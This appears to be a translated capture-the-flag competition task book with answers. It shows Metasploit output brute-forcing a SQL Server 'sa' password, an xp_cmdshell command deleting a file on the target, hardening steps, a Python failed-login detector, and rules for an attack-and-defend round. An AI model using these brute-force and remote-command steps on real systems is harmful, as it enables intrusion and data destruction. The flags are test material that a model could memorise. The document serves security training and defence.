[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:10 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:100 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1000 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1000s (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:100s (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1022 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:10s (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:10sne1 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1111 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:11111 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:111111 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:11111111 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:112233 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1212 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:121212 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1213 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1214 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1225 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:123 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:123123 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:123321 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1234 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:12345 (Incorrect: )
[+] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN SUCCESSFUL: WORKSTATION\\sa:123456
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Flag: completed
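5. From the penetration testing platform on PC2, exploit the extended stored procedures of the database service on the server scenario WebServ2003 to delete C:\\1.txt on the WebServ2003 server scenario, and submit the penetration testing command used, together with the first line echoed by the platform's run result, as the Flag;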
msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > set rhost 192.168.28.131
msf auxiliary(mssql_exec) > set password 123456
msf auxiliary(mssql_exec) > set cmd cmd.exe /c del \
msf auxiliary(mssql_exec) > run
[*] 192.168.28.131:1433 - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c del C:\\1.txt'
output
------
[*] Auxiliary module execution completed
Flag: [*] 192.168.28.131:1433 - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c del C:\\1.txt'
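6. Harden the database service on the server scenario WebServ2003 so that the penetration testing platform on PC2 can no longer brute-force the database super administrator password, and submit the last string in the hardened authentication option as the Flag: W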
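7. Verify the hardening: after the database service on WebServ2003 has been hardened, use the penetration testing platform on PC2 to brute-force the database service super administrator password on the server scenario WebServ2003 again (using the dictionary file superdic.txt on the penetration testing platform on PC2), and submit the content of the 3rd line from the top of the cracking result as the Flag;
msf auxiliary(mssql_login) > run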
[*] 192.168.28.131:1433 - 192.168.28.131:1433 - MSSQL - Starting authentication scanner.
[!] 192.168.28.131:1433 - No active DB -- Credential data will not be saved!
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!@#$% (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!@#$%^ (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!@#$%^& (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!@#$%^&* (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!boerbul (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!boerseun (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!gatvol (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!hotnot (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!kak (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!koedoe (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!likable (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!poes (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!pomp (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:!soutpiel (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:.net (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:0 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:000000 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:00000000 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:0007 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:007 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:007007 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:0s (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:0th (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:10 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:100 (Incorrect: )
[-] 192.168.28.131:1433 - 192.168.28.131:1433 - LOGIN FAILED: WORKSTATION\\sa:1000 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
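The server-side view of tasks 6 and 7, as an added example that is not part of the original task book: a detector that reads SQL Server failed-login records (error 18456) and reports clients that hammer one login, separating wrong-password failures from attempts rejected because the server only accepts Windows authentication. It assumes the ERRORLOG layout of SQL Server 2008 or later with failed-login auditing enabled; the function names, client addresses and log lines are constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Assumed ERRORLOG layout (SQL Server 2008+). State 8: wrong password; 58: SQL login on a Windows-only server.
ERR = re.compile(r"^(\S+ \S+) Logon\s+Error: 18456, Severity: \d+, State: (\d+)\.")
MSG = re.compile(r"Login failed for user '([^']*)'.*\[CLIENT: ([^\]]+)\]")
REASON = {8: "Password did not match that for the login provided.",
          58: "An attempt to login using SQL authentication failed. "
              "Server is configured for Windows authentication only."}

def parse_failures(lines):
    """Pair each 'Error: 18456' line with the 'Login failed' line that follows it."""
    events, pending = [], None
    for line in lines:
        err, msg = ERR.match(line), MSG.search(line)
        if msg and pending:
            events.append((*pending, msg.group(1), msg.group(2)))
        pending = (datetime.strptime(err.group(1), "%Y-%m-%d %H:%M:%S.%f"),
                   int(err.group(2))) if err else None
    return events

def find_bruteforce(events, threshold=10, window=timedelta(seconds=60)):
    """Map (client, login) to per-state failure counts if any window holds >= threshold failures."""
    by_key = defaultdict(list)
    for ts, state, user, client in sorted(events):
        by_key[(client, user)].append((ts, state))
    alerts = {}
    for key, items in by_key.items():
        start = 0
        for end, (ts, _) in enumerate(items):
            while ts - items[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[key] = dict(Counter(state for _, state in items))
                break
    return alerts

def constructed_sample():
    """Constructed log: 12 'sa' failures before hardening, 12 after, one unrelated typo."""
    rows = [(f"10:00:{i:02d}.10", 8, "sa", "198.51.100.7") for i in range(12)]
    rows.append(("10:05:00.00", 8, "app", "198.51.100.20"))
    rows += [(f"10:30:{i:02d}.10", 58, "sa", "198.51.100.7") for i in range(12)]
    out = []
    for t, state, user, client in rows:
        out.append(f"2024-05-01 {t} Logon       Error: 18456, Severity: 14, State: {state}.")
        out.append(f"2024-05-01 {t} Logon       Login failed for user '{user}'. "
                   f"Reason: {REASON[state]} [CLIENT: {client}]")
    return out
```

A burst that consists only of state 58 records means the dictionary attack is still running but can no longer succeed against a SQL login, which is the outcome task 7 checks for from the attacker's side.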
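(3) Phase 2 Task Book
Assume that each contestant is an information security engineer at an enterprise, responsible for server maintenance. One of the servers may have various problems and vulnerabilities (see the vulnerability list below). You need to harden this server as quickly as possible, and you need to conduct penetration tests against the other teams' systems, obtaining their FLAG values and submitting them to the referee server.
Hints:
1. In this phase, configure the IP address information yourself according to the venue IP parameter table;
2. The vulnerabilities on the server may be conventional vulnerabilities or system vulnerabilities; you need to harden the conventional vulnerabilities, and conduct penetration tests against the other teams' systems, obtaining their FLAG values and submitting them to the referee server.
Fifteen minutes later, contestants will formally enter the group confrontation stage.
Notes:
Note 1: A port scanning mechanism runs against every target machine at the competition venue. TCP ports 21, 22, 23 and 80 of the server must not be manually closed at any time; otherwise the contestant will be ordered to stop competing and the Phase 2 score will be 0;
Note 2: The referee server must not be attacked; otherwise the contestant will be ordered to stop competing and the Phase 2 score will be 0;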
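Note 3: The FLAG value is the unique identifier of each protected server, and each protected server has only one. The target machine's Flag value is stored in the content of the file ./root/flaginfo*; each submission of an opponent target machine's Flag value automatically scores points; each time an opponent submits your own target machine's Flag value, points are automatically deducted; the Flag value of each opponent target machine can be submitted by you only once;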
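Note 4: During the penetration testing stage, contestants must continue to protect their servers against all kinds of hacker attacks. You may continue to harden your server, and you may also choose to attack the protected servers of other groups.
The vulnerability list is as follows:
1. The website on the target machine may have a command injection vulnerability. Contestants are required to find the command injection vulnerability and use it to obtain certain privileges.
2. The website on the target machine may have a file upload vulnerability. Contestants are required to find the file upload vulnerability and use it to obtain certain privileges.
3. The website on the target machine may have a file inclusion vulnerability. Contestants are required to find the file inclusion vulnerability, combine it with other vulnerabilities to obtain certain privileges, and escalate privileges.
4. The services provided by the operating system may contain a remote code execution vulnerability. Users are required to find the service with remote code execution and use this vulnerability to obtain system privileges.
5. The services provided by the operating system may contain a buffer overflow vulnerability. Users are required to find the service with the buffer overflow vulnerability and use this vulnerability to obtain system privileges.
6. The operating system may contain some system backdoors. Contestants can find such a backdoor and use the pre-planted backdoor to obtain system privileges directly.
Through all of the vulnerability points above, contestants ultimately obtain the highest privileges on other contestants' target machines and obtain the FLAG values on those machines for submission.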